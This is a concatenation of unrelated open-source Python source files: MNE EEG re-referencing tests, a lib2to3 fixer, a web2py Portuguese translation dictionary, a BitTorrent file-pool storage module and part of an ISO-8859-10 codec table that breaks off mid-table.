_has_eeg_average_ref_proj(raw.info['projs'])) reref, ref_data = set_eeg_reference(raw) assert_true(_has_eeg_average_ref_proj(reref.info['projs'])) assert_true(ref_data is None) # Test setting an average reference when one was already present reref, ref_data = set_eeg_reference(raw, copy=False) assert_true(ref_data is None) # Rereference raw data by creating a copy of original data reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True) assert_true(reref.info['custom_ref_applied']) _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002']) # Test that data is modified in place when copy=False reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=False) assert_true(raw is reref) @testing.requires_testing_data def test_set_bipolar_reference(): """Test bipolar referencing""" raw = Raw(fif_fname, preload=True) reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar', {'kind': FIFF.FIFFV_EOG_CH, 'extra': 'some extra value'}) assert_true(reref.info['custom_ref_applied']) # Compare result to a manual calculation a = raw.pick_channels(['EEG 001', 'EEG 002'], copy=True) a = a._data[0, :] - a._data[1, :] b = reref.pick_channels(['bipolar'], copy=True)._data[0, :] assert_allclose(a, b) # Original channels should be replaced by a virtual one assert_true('EEG 001' not in reref.ch_names) assert_true('EEG 002' not in reref.ch_names) assert_true('bipolar' in reref.ch_names) # Check channel information bp_info = reref.info['chs'][reref.ch_names.index('bipolar')] an_info = reref.info['chs'][raw.ch_names.index('EEG 001')] for key in bp_info: if key == 'loc' or key == 'eeg_loc': assert_array_equal(bp_info[key], 0) elif key == 'coil_type': assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR) elif key == 'kind': assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH) else: assert_equal(bp_info[key], an_info[key]) assert_equal(bp_info['extra'], 'some extra value') # Minimalist call reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002') assert_true('EEG 001-EEG 002' in reref.ch_names) # Test creating a bipolar reference that doesn't involve EEG channels: # it should not set the custom_ref_applied flag reref = set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112', ch_info={'kind': FIFF.FIFFV_MEG_CH}) assert_true(not reref.info['custom_ref_applied']) assert_true('MEG 0111-MEG 0112' in reref.ch_names) # Test a battery of invalid inputs assert_raises(ValueError, set_bipolar_reference, raw, 'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar') assert_raises(ValueError, set_bipolar_reference, raw, ['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar') assert_raises(ValueError, set_bipolar_reference, raw, 'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2']) assert_raises(ValueError, set_bipolar_reference, raw, 'EEG 001', 'EEG 002', 'bipolar', ch_info=[{'foo': 'bar'}, {'foo': 'bar'}]) assert_raises(ValueError, set_bipolar_reference, raw, 'EEG 001', 'EEG 002', ch_name='EEG 003') @testing.requires_testing_data def test_add_reference(): raw = Raw(fif_fname, preload=True) picks_eeg = pick_types(raw.info, meg=False, eeg=True) # check if channel already exists assert_raises(ValueError, add_reference_channels, raw, raw.info['ch_names'][0]) # add reference channel to Raw raw_ref = add_reference_channels(raw, 'Ref', copy=True) assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1) assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :]) orig_nchan = raw.info['nchan'] raw = add_reference_channels(raw, 'Ref', copy=False) assert_array_equal(raw._data, raw_ref._data) assert_equal(raw.info['nchan'], orig_nchan + 1) ref_idx = raw.ch_names.index('Ref') ref_data, _ = raw[ref_idx] assert_array_equal(ref_data, 0) # add two reference channels to Raw raw = Raw(fif_fname, preload=True) picks_eeg = pick_types(raw.info, meg=False, eeg=True) assert_raises(ValueError, add_reference_channels, raw, raw.info['ch_names'][0]) raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True) assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2) assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :]) raw = add_reference_channels(raw, ['M1', 'M2'], copy=False) ref_idx = raw.ch_names.index('M1') ref_idy = raw.ch_names.index('M2') ref_data, _ = raw[[ref_idx, ref_idy]] assert_array_equal(ref_data, 0) # add reference channel to epochs raw = Raw(fif_fname, preload=True) events = read_events(eve_fname) picks_eeg = pick_types(raw.info, meg=False, eeg=True) epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5, picks=picks_eeg, preload=True) epochs_ref = add_reference_channels(epochs, 'Ref', copy=True) assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1) ref_idx = epochs_ref.ch_names.index('Ref') ref_data = epochs_ref.get_data()[:, ref_idx, :] assert_array_equal(ref_data, 0) picks_eeg = pick_types(epochs.info, meg=False, eeg=True) assert_array_equal(epochs.get_data()[:, picks_eeg, :], epochs_ref.get_data()[:, picks_eeg, :]) # add two reference channels to epochs raw = Raw(fif_fname, preload=True) events = read_events(eve_fname) picks_eeg = pick_types(raw.info, meg=False, eeg=True) epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5, picks=picks_eeg, preload=True) epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True) assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2) ref_idx = epochs_ref.ch_names.index('M1') ref_idy = epochs_ref.ch_names.index('M2') ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :] assert_array_equal(ref_data, 0) picks_eeg = pick_types(epochs.info, meg=False, eeg=True) assert_array_equal(epochs.get_data()[:, picks_eeg, :], epochs_ref.get_data()[:, picks_eeg, :]) # add reference channel to evoked raw = Raw(fif_fname, preload=True) events = read_events(eve_fname) picks_eeg = pick_types(raw.info, meg=False, eeg=True) epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5, picks=picks_eeg, preload=True) evoked = epochs.average() evoked_ref = add_reference_channels(evoked, 'Ref', copy=True) assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1) ref_idx = evoked_ref.ch_names.index('Ref') ref_data = evoked_ref.data[ref_idx, :] assert_array_equal(ref_data, 0) picks_eeg = pick_types(evoked.info, meg=False, eeg=True) assert_array_equal(evoked.data[picks_eeg, :], evoked_ref.data[picks_eeg, :]) # add two reference channels to evoked raw = Raw(fif_fname, preload=True) events = read_events(eve_fname) picks_eeg = pick_types(raw.info, meg=False, eeg=True) epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5, picks=picks_eeg, preload=True) evoked = epochs.average() evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True) assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2) ref_idx = evoked_ref.ch_names.index('M1') ref_idy = evoked_ref.ch_names.index('M2') ref_data = evoked_ref.data[[ref_idx, ref_idy], :] assert_array_equal(ref_data, 0) picks_eeg = pick_types(evoked.info, meg=False, eeg=True) assert_array_equal(evoked.data[picks_eeg, :], evoked_ref.data[picks_eeg, :]) # Test invalid inputs raw_np = Raw(fif_fname, preload=False) assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref']) assert_raises(ValueError, add_reference_channels, raw, 1)
bsd-3-clause
valkjsaaa/sl4a
python/src/Lib/lib2to3/fixes/fix_intern.py
49
1368
# Copyright 2006 Georg Brandl. # Licensed to PSF under a Contributor Agreement. """Fixer for intern(). intern(s) -> sys.intern(s)""" # Local imports from .. import pytree from .. import fixer_base from ..fixer_util import Name, Attr, touch_import class FixIntern(fixer_base.BaseFix): PATTERN = """ power< 'intern' trailer< lpar='(' ( not(arglist | argument<any '=' any>) obj=any | obj=arglist<(not argument<any '=' any>) any ','> ) rpar=')' > after=any* > """ def transform(self, node, results): syms = self.syms obj = results["obj"].clone() if obj.type == syms.arglist: newarglist = obj.clone() else: newarglist = pytree.Node(syms.arglist, [obj.clone()]) after = results["after"] if after: after = [n.clone() for n in after] new = pytree.Node(syms.power, Attr(Name("sys"), Name("intern")) + [pytree.Node(syms.trailer, [results["lpar"].clone(), newarglist, results["rpar"].clone()])] + after) new.set_prefix(node.get_prefix()) touch_import(None, 'sys', node) return new
apache-2.0
urrego093/proyecto_mv
applications/welcome/languages/pt-br.py
88
7249
# -*- coding: utf-8 -*- { '!langcode!': 'pt-br', '!langname!': 'Português (do Brasil)', '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" é uma expressão opcional como "campo1=\'novovalor\'". Você não pode atualizar ou apagar os resultados de um JOIN', '%s %%{row} deleted': '%s linhas apagadas', '%s %%{row} updated': '%s linhas atualizadas', '%s selected': '%s selecionado', '%Y-%m-%d': '%d-%m-%Y', '%Y-%m-%d %H:%M:%S': '%d-%m-%Y %H:%M:%S', 'About': 'Sobre', 'Access Control': 'Controle de Acesso', 'Administrative Interface': 'Interface Administrativa', '@markmin\x01An error occured, please [[reload %s]] the page': 'Ocorreu um erro, por favor [[reload %s]] a página', 'Administrative interface': 'Interface administrativa', 'Ajax Recipes': 'Receitas de Ajax', 'appadmin is disabled because insecure channel': 'Administração desativada porque o canal não é seguro', 'Are you sure you want to delete this object?': 'Você está certo que deseja apagar este objeto?', 'Available Databases and Tables': 'Bancos de dados e tabelas disponíveis', 'Buy this book': 'Compre o livro', 'cache': 'cache', 'Cache': 'Cache', 'Cache Keys': 'Chaves de cache', 'Cannot be empty': 'Não pode ser vazio', 'change password': 'modificar senha', 'Check to delete': 'Marque para apagar', 'Clear CACHE?': 'Limpar CACHE?', 'Clear DISK': 'Limpar DISCO', 'Clear RAM': 'Limpar memória RAM', 'Client IP': 'IP do cliente', 'Community': 'Comunidade', 'Components and Plugins': 'Componentes e Plugins', 'Controller': 'Controlador', 'Copyright': 'Copyright', 'Current request': 'Requisição atual', 'Current response': 'Resposta atual', 'Current session': 'Sessão atual', 'customize me!': 'Personalize-me!', 'data uploaded': 'dados enviados', 'Database': 'banco de dados', 'Database %s select': 'Selecionar banco de dados %s', 'db': 'bd', 'DB Model': 'Modelo BD', 'Delete:': 'Apagar:', 'Demo': 'Demo', 'Deployment Recipes': 'Receitas de deploy', 'Description': 'Descrição', 'design': 'projeto', 'DISK': 'DISK', 'Disk Cache Keys': 'Chaves do Cache de Disco', 'Disk Cleared': 'Disco Limpo', 'Documentation': 'Documentação', "Don't know what to do?": "Não sabe o que fazer?", 'done!': 'concluído!', 'Download': 'Download', 'E-mail': 'E-mail', 'Edit': 'Editar', 'Edit current record': 'Editar o registro atual', 'edit profile': 'editar perfil', 'Edit This App': 'Editar esta aplicação', 'Email and SMS': 'Email e SMS', 'Errors': 'Erros', 'Enter an integer between %(min)g and %(max)g': 'Informe um valor inteiro entre %(min)g e %(max)g', 'export as csv file': 'exportar como um arquivo csv', 'FAQ': 'Perguntas frequentes', 'First name': 'Nome', 'Forms and Validators': 'Formulários e Validadores', 'Free Applications': 'Aplicações gratuitas', 'Group ID': 'ID do Grupo', 'Groups': 'Grupos', 'Hello World': 'Olá Mundo', 'Home': 'Principal', 'How did you get here?': 'Como você chegou aqui?', 'import': 'importar', 'Import/Export': 'Importar/Exportar', 'Index': 'Início', 'insert new': 'inserir novo', 'insert new %s': 'inserir novo %s', 'Internal State': 'Estado Interno', 'Introduction': 'Introdução', 'Invalid email': 'Email inválido', 'Invalid Query': 'Consulta Inválida', 'invalid request': 'requisição inválida', 'Key': 'Chave', 'Last name': 'Sobrenome', 'Layout': 'Layout', 'Layout Plugins': 'Plugins de Layout', 'Layouts': 'Layouts', 'Live chat': 'Chat ao vivo', 'Live Chat': 'Chat ao vivo', 'login': 'Entrar', 'Login': 'Autentique-se', 'logout': 'Sair', 'Lost Password': 'Esqueceu sua senha?', 'lost password?': 'esqueceu sua senha?', 'Main Menu': 'Menu Principal', 'Manage Cache': 'Gerenciar Cache', 'Menu Model': 'Modelo de Menu', 'My Sites': 'Meus sites', 'Name': 'Nome', 'New Record': 'Novo Registro', 'new record inserted': 'novo registro inserido', 'next 100 rows': 'próximas 100 linhas', 'No databases in this application': 'Não há bancos de dados nesta aplicação', 'Object or table name': 'Nome do objeto do da tabela', 'Online examples': 'Exemplos online', 'or import from csv file': 'ou importar de um arquivo csv', 'Origin': 'Origem', 'Other Plugins': 'Outros Plugins', 'Other Recipes': 'Outras Receitas', 'Overview': 'Visão Geral', 'Password': 'Senha', 'Plugins': 'Plugins', 'Powered by': 'Desenvolvido com', 'Preface': 'Prefácio', 'previous 100 rows': '100 linhas anteriores', 'Python': 'Python', 'Query:': 'Consulta:', 'Quick Examples': 'Exemplos rápidos', 'RAM': 'RAM', 'RAM Cache Keys': 'RAM Cache Keys', 'Ram Cleared': 'Ram Cleared', 'Recipes': 'Receitas', 'Record': 'Registro', 'record does not exist': 'registro não existe', 'Record ID': 'ID do Registro', 'Record id': 'id do registro', 'Register': 'Registre-se', 'register': 'Registre-se', 'Registration key': 'Chave de registro', 'Reset Password key': 'Resetar chave de senha', 'Resources': 'Recursos', 'Role': 'Papel', 'Registration identifier': 'Idenficador de registro', 'Rows in Table': 'Linhas na tabela', 'Rows selected': 'Linhas selecionadas', 'Semantic': 'Semântico', 'Services': 'Serviço', 'Size of cache:': 'Tamanho do cache:', 'state': 'estado', 'Statistics': 'Estatísticas', 'Stylesheet': 'Folha de estilo', 'submit': 'enviar', 'Support': 'Suporte', 'Sure you want to delete this object?': 'Está certo(a) que deseja apagar este objeto?', 'Table': 'Tabela', 'Table name': 'Nome da tabela', 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'Uma "consulta" é uma condição como "db.tabela1.campo1==\'valor\'". Expressões como "db.tabela1.campo1==db.tabela2.campo2" resultam em um JOIN SQL.', 'The Core': 'The Core', 'The output of the file is a dictionary that was rendered by the view %s': 'A saída do arquivo é um dicionário que foi apresentado pela visão %s', 'The Views': 'As views', 'This App': 'Esta aplicação', 'This email already has an account': 'Este email já tem uma conta', 'This is a copy of the scaffolding application': 'Isto é uma cópia da aplicação modelo', 'Time in Cache (h:m:s)': 'Tempo em Cache (h:m:s)', 'Timestamp': 'Timestamp', 'Twitter': 'Twitter', 'unable to parse csv file': 'não foi possível analisar arquivo csv', 'Update:': 'Atualizar:', 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, e ~(...) para NOT para construir consultas mais complexas.', 'User ID': 'ID do Usuário', 'User Voice': 'Opinião dos usuários', 'Videos': 'Vídeos', 'View': 'Visualização', 'Web2py': 'Web2py', 'Welcome': 'Bem-vindo', 'Welcome %s': 'Bem-vindo %s', 'Welcome to web2py': 'Bem-vindo ao web2py', 'Welcome to web2py!': 'Bem-vindo ao web2py!', 'Which called the function %s located in the file %s': 'Que chamou a função %s localizada no arquivo %s', 'You are successfully running web2py': 'Você está executando o web2py com sucesso', 'You are successfully running web2py.': 'Você está executando o web2py com sucesso.', 'You can modify this application and adapt it to your needs': 'Você pode modificar esta aplicação e adaptá-la às suas necessidades', 'You visited the url %s': 'Você acessou a url %s', 'Working...': 'Trabalhando...', }
gpl-3.0
rabimba/p2pScrapper
BitTorrent-5.2.2/BitTorrent/Storage_threadpool.py
6
14110
# The contents of this file are subject to the BitTorrent Open Source License # Version 1.1 (the License). You may not copy or use this file, in either # source code or executable form, except in compliance with the License. You # may obtain a copy of the License at http://www.bittorrent.com/license/. # # Software distributed under the License is distributed on an AS IS basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # Written by Bram Cohen and Greg Hazel import os import sys import Queue from bisect import bisect_right from BTL.translation import _ from BTL.obsoletepythonsupport import set from BitTorrent import BTFailure from BTL.defer import Deferred, ThreadedDeferred, Failure, wrap_task from BTL.yielddefer import launch_coroutine from BitTorrent.platform import get_allocated_regions from BTL.sparse_set import SparseSet from BTL.DictWithLists import DictWithLists, DictWithSets import BTL.stackthreading as threading from BitTorrent.Storage_base import open_sparse_file, make_file_sparse from BitTorrent.Storage_base import bad_libc_workaround, is_open_for_write from BitTorrent.Storage_base import UnregisteredFileException class FilePool(object): def __init__(self, doneflag, add_task, external_add_task, max_files_open, num_disk_threads): self.doneflag = doneflag self.external_add_task = external_add_task self.file_to_torrent = {} self.free_handle_condition = threading.Condition() self.active_file_to_handles = DictWithSets() self.open_file_to_handles = DictWithLists() self.set_max_files_open(max_files_open) self.diskq = Queue.Queue() for i in xrange(num_disk_threads): t = threading.Thread(target=self._disk_thread, name="disk_thread-%s" % (i+1)) t.start() self.doneflag.addCallback(self.finalize) def finalize(self, r=None): # re-queue self so all threads die. we end up with one extra event on # the queue, but who cares. self._create_op(self.finalize) def close_all(self): failures = {} self.free_handle_condition.acquire() while self.get_open_file_count() > 0: while len(self.open_file_to_handles) > 0: filename, handle = self.open_file_to_handles.popitem() try: handle.close() except Exception, e: failures[self.file_to_torrent[filename]] = e self.free_handle_condition.notify() if self.get_open_file_count() > 0: self.free_handle_condition.wait(1) self.free_handle_condition.release() for torrent, e in failures.iteritems(): torrent.got_exception(e) def close_files(self, file_set): failures = set() self.free_handle_condition.acquire() done = False while not done: filenames = list(self.open_file_to_handles.iterkeys()) for filename in filenames: if filename not in file_set: continue handles = self.open_file_to_handles.poprow(filename) for handle in handles: try: handle.close() except Exception, e: failures.add(e) self.free_handle_condition.notify() done = True for filename in file_set.iterkeys(): if filename in self.active_file_to_handles: done = False break if not done: self.free_handle_condition.wait(0.5) self.free_handle_condition.release() if len(failures) > 0: raise failures.pop() def set_max_files_open(self, max_files_open): if max_files_open <= 0: max_files_open = 1e100 self.max_files_open = max_files_open self.close_all() def add_files(self, files, torrent): for filename in files: if filename in self.file_to_torrent: raise BTFailure(_("File %s belongs to another running torrent") % filename) for filename in files: self.file_to_torrent[filename] = torrent def remove_files(self, files): for filename in files: del self.file_to_torrent[filename] def _ensure_exists(self, filename, length=0): if not os.path.exists(filename): f = os.path.split(filename)[0] if f != '' and not os.path.exists(f): os.makedirs(f) f = file(filename, 'wb') make_file_sparse(filename, f, length) f.close() def get_open_file_count(self): t = self.open_file_to_handles.total_length() t += self.active_file_to_handles.total_length() return t def acquire_handle(self, filename, for_write, length=0): # this will block until a new file handle can be made self.free_handle_condition.acquire() if filename not in self.file_to_torrent: self.free_handle_condition.release() raise UnregisteredFileException() while self.active_file_to_handles.total_length() == self.max_files_open: self.free_handle_condition.wait() if filename in self.open_file_to_handles: handle = self.open_file_to_handles.pop_from_row(filename) if for_write and not is_open_for_write(handle.mode): handle.close() handle = open_sparse_file(filename, 'rb+', length=length) #elif not for_write and is_open_for_write(handle.mode): # handle.close() # handle = open_sparse_file(filename, 'rb', length=length) else: if self.get_open_file_count() == self.max_files_open: oldfname, oldhandle = self.open_file_to_handles.popitem() oldhandle.close() self._ensure_exists(filename, length) if for_write: handle = open_sparse_file(filename, 'rb+', length=length) else: handle = open_sparse_file(filename, 'rb', length=length) self.active_file_to_handles.push_to_row(filename, handle) self.free_handle_condition.release() return handle def release_handle(self, filename, handle): self.free_handle_condition.acquire() self.active_file_to_handles.remove_fom_row(filename, handle) self.open_file_to_handles.push_to_row(filename, handle) self.free_handle_condition.notify() self.free_handle_condition.release() def _create_op(self, _f, *args, **kwargs): df = Deferred() self.diskq.put((df, _f, args, kwargs)) return df read = _create_op write = _create_op def _disk_thread(self): while not self.doneflag.isSet(): df, func, args, kwargs = self.diskq.get(True) try: v = func(*args, **kwargs) except: self.external_add_task(0, df.errback, Failure()) else: self.external_add_task(0, df.callback, v) class Storage(object): def __init__(self, config, filepool, save_path, files, add_task, external_add_task, doneflag): self.filepool = filepool self.config = config self.doneflag = doneflag self.add_task = add_task self.external_add_task = external_add_task self.initialize(save_path, files) def initialize(self, save_path, files): # a list of bytes ranges and filenames for window-based IO self.ranges = [] # a dict of filename-to-ranges for piece priorities and filename lookup self.range_by_name = {} # a sparse set for smart allocation detection self.allocated_regions = SparseSet() # dict of filename-to-length on disk (for % complete in the file view) self.undownloaded = {} self.save_path = save_path # Rather implement this as an ugly hack here than change all the # individual calls. Affects all torrent instances using this module. if self.config['bad_libc_workaround']: bad_libc_workaround() self.initialized = False self.startup_df = ThreadedDeferred(wrap_task(self.external_add_task), self._build_file_structs, self.filepool, files) return self.startup_df def _build_file_structs(self, filepool, files): total = 0 for filename, length in files: # we're shutting down, abort. if self.doneflag.isSet(): return False self.undownloaded[filename] = length if length > 0: self.ranges.append((total, total + length, filename)) self.range_by_name[filename] = (total, total + length) if os.path.exists(filename): if not os.path.isfile(filename): raise BTFailure(_("File %s already exists, but is not a " "regular file") % filename) l = os.path.getsize(filename) if l > length: # This is the truncation Bram was talking about that no one # else thinks is a good idea. #h = file(filename, 'rb+') #make_file_sparse(filename, h, length) #h.truncate(length) #h.close() l = length a = get_allocated_regions(filename, begin=0, length=l) if a is not None: a.offset(total) else: a = SparseSet() if l > 0: a.add(total, total + l) self.allocated_regions += a total += length self.total_length = total self.initialized = True return True def get_byte_range_for_filename(self, filename): if filename not in self.range_by_name: filename = os.path.normpath(filename) filename = os.path.join(self.save_path, filename) return self.range_by_name[filename] def was_preallocated(self, pos, length): return self.allocated_regions.is_range_in(pos, pos+length) def get_total_length(self): return self.total_length def _intervals(self, pos, amount): r = [] stop = pos + amount p = max(bisect_right(self.ranges, (pos, 2 ** 500)) - 1, 0) for begin, end, filename in self.ranges[p:]: if begin >= stop: break r.append((filename, max(pos, begin) - begin, min(end, stop) - begin)) return r def _read(self, filename, pos, amount): begin, end = self.get_byte_range_for_filename(filename) length = end - begin h = self.filepool.acquire_handle(filename, for_write=False, length=length) if h is None: return try: h.seek(pos) r = h.read(amount) finally: self.filepool.release_handle(filename, h) return r def _batch_read(self, pos, amount): dfs = [] r = [] # queue all the reads for filename, pos, end in self._intervals(pos, amount): df = self.filepool.read(self._read, filename, pos, end - pos) dfs.append(df) # yield on all the reads in order - they complete in any order exc = None for df in dfs: yield df try: r.append(df.getResult()) except: exc = exc or sys.exc_info() if exc: raise exc[0], exc[1], exc[2] r = ''.join(r) if len(r) != amount: raise BTFailure(_("Short read (%d of %d) - something truncated files?") % (len(r), amount)) yield r def read(self, pos, amount): df = launch_coroutine(wrap_task(self.add_task), self._batch_read, pos, amount) return df def _write(self, filename, pos, s): begin, end = self.get_byte_range_for_filename(filename) length = end - begin h = self.filepool.acquire_handle(filename, for_write=True, length=length) if h is None: return try: h.seek(pos) h.write(s) finally: self.filepool.release_handle(filename, h) return len(s) def _batch_write(self, pos, s): dfs = [] total = 0 amount = len(s) # queue all the writes for filename, begin, end in self._intervals(pos, amount): length = end - begin d = buffer(s, total, length) total += length df = self.filepool.write(self._write, filename, begin, d) dfs.append(df) # yield on all the writes - they complete in any order exc = None for df in dfs: yield df try: df.getResult() except: exc = exc or sys.exc_info() if exc: raise exc[0], exc[1], exc[2] yield total def write(self, pos, s): df = launch_coroutine(wrap_task(self.add_task), self._batch_write, pos, s) return df def close(self): if not self.initialized: self.startup_df.addCallback(lambda *a : self.filepool.close_files(self.range_by_name)) return self.startup_df self.filepool.close_files(self.range_by_name) def downloaded(self, pos, length): for filename, begin, end in self._intervals(pos, length): self.undownloaded[filename] -= end - begin
mit
jcoady9/python-for-android
python3-alpha/python3-src/Lib/encodings/iso8859_10.py
272
13589
""" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py. """#" import codecs ### Codec APIs class Codec(codecs.Codec): def encode(self,input,errors='strict'): return codecs.charmap_encode(input,errors,encoding_table) def decode(self,input,errors='strict'): return codecs.charmap_decode(input,errors,decoding_table) class IncrementalEncoder(codecs.IncrementalEncoder): def encode(self, input, final=False): return codecs.charmap_encode(input,self.errors,encoding_table)[0] class IncrementalDecoder(codecs.IncrementalDecoder): def decode(self, input, final=False): return codecs.charmap_decode(input,self.errors,decoding_table)[0] class StreamWriter(Codec,codecs.StreamWriter): pass class StreamReader(Codec,codecs.StreamReader): pass ### encodings module API def getregentry(): return codecs.CodecInfo( name='iso8859-10', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter, ) ### Decoding Table decoding_table = ( '\x00' # 0x00 -> NULL '\x01' # 0x01 -> START OF HEADING '\x02' # 0x02 -> START OF TEXT '\x03' # 0x03 -> END OF TEXT '\x04' # 0x04 -> END OF TRANSMISSION '\x05' # 0x05 -> ENQUIRY '\x06' # 0x06 -> ACKNOWLEDGE '\x07' # 0x07 -> BELL '\x08' # 0x08 -> BACKSPACE '\t' # 0x09 -> HORIZONTAL TABULATION '\n' # 0x0A -> LINE FEED '\x0b' # 0x0B -> VERTICAL TABULATION '\x0c' # 0x0C -> FORM FEED '\r' # 0x0D -> CARRIAGE RETURN '\x0e' # 0x0E -> SHIFT OUT '\x0f' # 0x0F -> SHIFT IN '\x10' # 0x10 -> DATA LINK ESCAPE '\x11' # 0x11 -> DEVICE CONTROL ONE '\x12' # 0x12 -> DEVICE CONTROL TWO '\x13' # 0x13 -> DEVICE CONTROL THREE '\x14' # 0x14 -> DEVICE CONTROL FOUR '\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE '\x16' # 0x16 -> SYNCHRONOUS IDLE '\x17' # 0x17 -> END OF TRANSMISSION BLOCK '\x18' # 0x18 -> CANCEL '\x19' # 0x19 -> END OF MEDIUM '\x1a' # 0x1A -> SUBSTITUTE '\x1b' # 0x1B -> ESCAPE '\x1c' # 0x1C -> FILE SEPARATOR '\x1d' # 0x1D -> GROUP SEPARATOR '\x1e' # 0x1E -> RECORD SEPARATOR '\x1f' # 0x1F -> UNIT SEPARATOR ' ' # 0x20 -> SPACE '!' # 0x21 -> EXCLAMATION MARK '"' # 0x22 -> QUOTATION MARK '#' # 0x23 -> NUMBER SIGN '$' # 0x24 -> DOLLAR SIGN '%' # 0x25 -> PERCENT SIGN '&' # 0x26 -> AMPERSAND "'" # 0x27 -> APOSTROPHE '(' # 0x28 -> LEFT PARENTHESIS ')' # 0x29 -> RIGHT PARENTHESIS '*' # 0x2A -> ASTERISK '+' # 0x2B -> PLUS SIGN ',' # 0x2C -> COMMA '-' # 0x2D -> HYPHEN-MINUS '.' # 0x2E -> FULL STOP '/' # 0x2F -> SOLIDUS '0' # 0x30 -> DIGIT ZERO '1' # 0x31 -> DIGIT ONE '2' # 0x32 -> DIGIT TWO '3' # 0x33 -> DIGIT THREE '4' # 0x34 -> DIGIT FOUR '5' # 0x35 -> DIGIT FIVE '6' # 0x36 -> DIGIT SIX '7' # 0x37 -> DIGIT SEVEN '8' # 0x38 -> DIGIT EIGHT '9' # 0x39 -> DIGIT NINE ':' # 0x3A -> COLON ';' # 0x3B -> SEMICOLON '<' # 0x3C -> LESS-THAN SIGN '=' # 0x3D -> EQUALS SIGN '>' # 0x3E -> GREATER-THAN SIGN '?' # 0x3F -> QUESTION MARK '@' # 0x40 -> COMMERCIAL AT 'A' # 0x41 -> LATIN CAPITAL LETTER A 'B' # 0x42 -> LATIN CAPITAL LETTER B 'C' # 0x43 -> LATIN CAPITAL LETTER C 'D' # 0x44 -> LATIN CAPITAL LETTER D 'E' # 0x45 -> LATIN CAPITAL LETTER E 'F' # 0x46 -> LATIN CAPITAL LETTER F 'G' # 0x47 -> LATIN CAPITAL LETTER G 'H' # 0x48 -> LATIN CAPITAL LETTER H 'I' # 0x49 -> LATIN CAPITAL LETTER I 'J' # 0x4A -> LATIN CAPITAL LETTER J 'K' # 0x4B -> LATIN CAPITAL LETTER K 'L' # 0x4C -> LATIN CAPITAL LETTER L 'M' # 0x4D -> LATIN CAPITAL LETTER M 'N' # 0x4E -> LATIN CAPITAL LETTER N 'O' # 0x4F -> LATIN CAPITAL LETTER O 'P' # 0x50 -> LATIN CAPITAL LETTER P 'Q' # 0x51 -> LATIN CAPITAL LETTER Q 'R' # 0x52 -> LATIN CAPITAL LETTER R 'S' # 0x53 -> LATIN CAPITAL LETTER S 'T' # 0x54 -> LATIN CAPITAL LETTER T 'U' # 0x55 -> LATIN CAPITAL LETTER U 'V' # 0x56 -> LATIN CAPITAL LETTER V 'W' # 0x57 -> LATIN CAPITAL LETTER W 'X' # 0x58 -> LATIN CAPITAL LETTER X 'Y' # 0x59 -> LATIN CAPITAL LETTER Y 'Z' # 0x5A -> LATIN CAPITAL LETTER Z '[' # 0x5B -> LEFT SQUARE BRACKET '\\' # 0x5C -> REVERSE SOLIDUS ']' # 0x5D -> RIGHT SQUARE BRACKET '^' # 0x5E -> CIRCUMFLEX ACCENT '_' # 0x5F -> LOW LINE '`' # 0x60 -> GRAVE ACCENT 'a' # 0x61 -> LATIN SMALL LETTER A 'b' # 0x62 -> LATIN SMALL LETTER B 'c' # 0x63 -> LATIN SMALL LETTER C 'd' # 0x64 -> LATIN SMALL LETTER D 'e' # 0x65 -> LATIN SMALL LETTER E 'f' # 0x66 -> LATIN SMALL LETTER F 'g' # 0x67 -> LATIN SMALL LETTER G 'h' # 0x68 -> LATIN SMALL LETTER H 'i' # 0x69 -> LATIN SMALL LETTER I 'j' # 0x6A -> LATIN SMALL LETTER J 'k' # 0x6B -> LATIN SMALL LETTER K 'l' # 0x6C -> LATIN SMALL LETTER L 'm' # 0x6D -> LATIN SMALL LETTER M 'n' # 0x6E -> LATIN SMALL LETTER N 'o' # 0x6F -> LATIN SMALL LETTER O 'p' # 0x70 -> LATIN SMALL LETTER P 'q' # 0x71 -> LATIN SMALL LETTER Q 'r' # 0x72 -> LATIN SMALL LETTER R 's' # 0x73 -> LATIN SMALL LETTER S 't' # 0x74 -> LATIN SMALL LETTER T 'u' # 0x75 -> LATIN SMALL LETTER U 'v' # 0x76 -> LATIN SMALL LETTER V 'w' # 0x77 -> LATIN SMALL LETTER W 'x' # 0x78 -> LATIN SMALL LETTER X 